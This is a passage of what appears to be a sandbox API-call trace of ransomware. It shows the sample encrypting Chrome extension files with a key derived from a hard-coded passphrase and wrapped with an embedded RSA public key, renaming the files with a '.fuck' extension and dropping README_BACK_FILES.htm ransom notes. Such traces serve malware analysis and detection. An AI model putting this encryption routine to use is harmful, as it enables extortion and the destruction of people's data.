dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.220] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.220] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.223] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.223] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.223] CryptHashData (hHash=0x2e7fb40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.223] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fb40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fbc0) returned 1 [0258.223] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.223] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.223] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79e18) returned 1 [0258.224] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79e18, dwCertEncodingType=0x1, pInfo=0x2e26140*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26170*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26178*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ffc0) returned 1 [0258.224] CryptEncrypt (in: hKey=0x2e7ffc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.224] CryptEncrypt (in: hKey=0x2e7ffc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7ac70*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7ac70*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.224] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7ac70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7ac70*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.225] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc2, lpOverlapped=0x0) returned 1 [0258.226] CryptEncrypt (in: hKey=0x2e7fbc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0258.226] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0258.226] CloseHandle (hObject=0x5d5c) returned 1 [0258.226] CloseHandle (hObject=0x5d60) returned 1 [0258.226] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json"), bFailIfExists=0) returned 1 [0258.229] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json", dwFileAttributes=0x0) returned 1 [0258.230] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.gsg")) returned 1 [0258.231] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\messages.json.fuck")) returned 1 [0258.232] CryptDestroyHash (hHash=0x2e7fb40) returned 1 [0258.232] CryptDestroyKey (hKey=0x2e7fbc0) returned 1 [0258.232] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.232] FindNextFileA (in: hFindFile=0x2e7ff00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.232] FindClose (in: hFindFile=0x2e7ff00 | out: hFindFile=0x2e7ff00) returned 1 [0258.232] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\readme_back_files.htm")) returned 0xffffffff [0258.232] AreFileApisANSI () returned 1 [0258.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.233] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.233] GetFileType (hFile=0x5d50) returned 0x1 [0258.233] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.234] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0258.234] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0258.234] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\readme_back_files.htm")) returned 0xffffffff [0258.234] AreFileApisANSI () returned 1 [0258.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0258.235] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0258.235] GetFileType (hFile=0x5d64) returned 0x1 [0258.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0258.236] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0258.236] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0258.236] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.236] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.237] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.237] GetLastError () returned 0x0 [0258.237] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json")) returned 0x20 [0258.237] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json", dwFileAttributes=0x80) returned 1 [0258.238] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.238] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.254] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg", dwFileAttributes=0x2) returned 1 [0258.254] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e796a8) returned 1 [0258.257] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.257] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.257] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.257] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7fb00) returned 1 [0258.257] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.257] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0258.257] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e7ad80) returned 1 [0258.258] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7ad80, dwCertEncodingType=0x1, pInfo=0x2e27250*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27280*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27288*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7fb40) returned 1 [0258.258] CryptEncrypt (in: hKey=0x2e7fb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0258.258] CryptEncrypt (in: hKey=0x2e7fb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7ae08*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e7ae08*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0258.258] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7ae08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e7ae08*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.259] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.282] CryptEncrypt (in: hKey=0x2e7fb00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.282] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.307] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.307] CryptEncrypt (in: hKey=0x2e7fb00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.307] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.307] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.307] CryptEncrypt (in: hKey=0x2e7fb00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0258.307] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0258.307] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x73, lpOverlapped=0x0) returned 1 [0258.307] CryptEncrypt (in: hKey=0x2e7fb00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x73, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x80) returned 1 [0258.307] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0258.307] CloseHandle (hObject=0x5d50) returned 1 [0258.307] CloseHandle (hObject=0x5d60) returned 1 [0258.307] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json"), bFailIfExists=0) returned 1 [0258.317] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json", dwFileAttributes=0x0) returned 1 [0258.317] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.gsg")) returned 1 [0258.318] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\computed_hashes.json.fuck")) returned 1 [0258.320] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0258.320] CryptDestroyKey (hKey=0x2e7fb00) returned 1 [0258.320] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.320] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.320] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0258.320] GetLastError () returned 0x0 [0258.320] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json")) returned 0x20 [0258.320] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0258.321] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.321] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.322] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0258.323] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e796a8) returned 1 [0258.325] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0258.325] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.325] CryptHashData (hHash=0x2e7ff00, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.325] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7ff00, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7fc40) returned 1 [0258.326] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 